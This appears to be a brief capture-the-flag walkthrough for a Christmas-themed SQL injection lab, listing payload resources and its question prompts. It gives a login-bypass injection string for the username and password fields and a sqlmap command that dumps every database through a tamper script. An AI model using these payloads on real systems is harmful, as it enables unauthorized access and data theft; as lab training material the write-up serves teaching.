Someone stole Santa's gift list!

Web Exploitation ; sql injection ; sqli ; sqlmap

Video

Resources

List of SQL Commands: https://www.codecademy.com/articles/sql-commandsarrow-up-right

Check out this cheat sheet: swisskyrepo/PayloadsAllTheThingsarrow-up-right

Payload list: payloadbox/sql-injection-payload-listarrow-up-right

In-depth SQL Injection tutorial: SQLi Basicsarrow-up-right

SQLMAP cheatsheetarrow-up-right

Challenge

Without using directory brute forcing, what's Santa's secret login panel?

circle-check

Visit Santa's secret login panel and bypass the login using SQLi

Username 'or true --

Password '--

circle-check

How many entries are there in the gift database?

Save Item

sqlmap -r santapanel.req --tamper=space2comment --dump-all -dbms sqlite

circle-check

What did Paul ask for?

circle-check

What is the flag?

circle-check

What is admin's password?

circle-check

Last updated